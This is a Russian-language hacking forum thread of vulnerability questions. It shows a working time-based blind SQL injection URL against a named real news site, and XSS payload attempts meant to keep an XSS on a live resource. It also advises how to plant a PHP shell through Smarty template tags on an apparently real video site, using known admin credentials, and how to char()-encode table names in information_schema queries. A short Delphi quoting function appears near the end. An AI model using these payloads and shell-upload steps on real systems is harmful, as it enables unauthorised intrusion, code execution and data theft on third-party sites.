Ваши вопросы по уязвимостям.

С помощью BENCHMARK-ка только получилось
http://www.yerevan.ru/news/print.php?id=128%20and%20id=IF(SUBSTRING(version(),1,1)=4,1,BENCHMARK(299971,MD5(NOW())))

 

Можно ли в теге
<a href="123" <здесь> " target="_blank" class="bb-url"> 234 </a>
вставить javascript, который будет исполняться сразу при заходе на страницу(не выпонляя никаких действий)? Пробовал следующие варианты, но безрезультатно...

Code:

style=background-image:url(javascript:alert(1);)
sss='alert(1);this.sss=null' style='top:expression(eval(this.sss);)'
style=url(javascript:alert(1);)

 

а подробней можно,что это дает?

 

fobofob, вот здесь подробней http://forum.antichat.ru/thread35207.html

смысл в использовании подзапросов, т.е. если логическое выражение SUBSTRING(version(),1,1)=4 правильное, то просто id сравнивается с 1, а если неправильное, то выполняется BENCHMARK(299971,MD5(NOW())), а это достаточно долго, т.е если логическое выражение правильное, то запрос выполнится сразу, а если неправильное, то "загрузка" страницы ненадолго "зависнет"

 

AFoST, JavaScript внутри style работает только в ИЕ. В других браузерах не получится

 

Хреново :-( Другие варианты вобще есть для ФФ и оперы? А то жалко терять xss на таком ресурсе

 

Видимо, нет. Рад был бы ошибиться. Для тэга A разве что прописать события onclick, onmouseover и т.д., но минусы тут очевидны - потребуется какое-то действие от пользователя

 

onmouseover, onclick это само собой..ладно, спасибо за помощь!

 

Привет! Если я знаю логин и пасс админа в ютуб, как можно залить шелл?

 

А если я знаю логин и пасс от админки google, как мне туда шелл залить??

PS ближе к телу, какой движок. Попробуй залить вместо видео =/

 

Вместо видео некан.
ЫЫ.. а как движок узнать?

 

Если подписано внизу страницы что-то типа Powered by ***

Или надо искать по дорку такие же движки, где подписано...

 

в том дело что нет поверед бай, и в админке нет. В админке могу редактировать наблоны *.tpl, знаю их полный адрес

 

вот по дорку узнал
Copyright © 2008 Powered By TeacherTube, LLC

 

Тогда это что-то типа clipshare или vshare youtube clone. Если редактирование получается, тогда вставляй между тегами {php}{/php} произвольный php код, это шаблоны smarty скорее всего. На странице, темплейт которой ты отредактируешь - код будет исполняться.

 

xxx в Sql hex, без кавычек. Кодер здесь --> http://hack-shop.org.ru/tools-code-encode

 

Ты немного не правильно понимаешь процедуру кодировки через char(). В скул-запросе чар используется следующим образом
+from+information_schema.columns+where+table_name=char(ascii,ascii,...,)
например
+from+information_schema.columns+where+table_name=char(116,101,115,116)/*
char(116,101,115,116)=test БЕЗ ковычек.

 

кто может выложить?

 

SQL-инъекция

Code:

statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';
function QuoteParam(s : string) : string;
{ на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
var
  i : integer;
  Dest : string;
begin
  Dest := '"';
  for i:=1 to length(s) do 
    case si of
      ' : Dest := Dest + '\;
      '"' : Dest := Dest + '\"';
      '\' : Dest := Dest + '\\';
    else Dest := Dest + si;
    end; 
  QuoteParam := Dest + '"';
end;

 

компоненты для мамбы на делфи?... О_О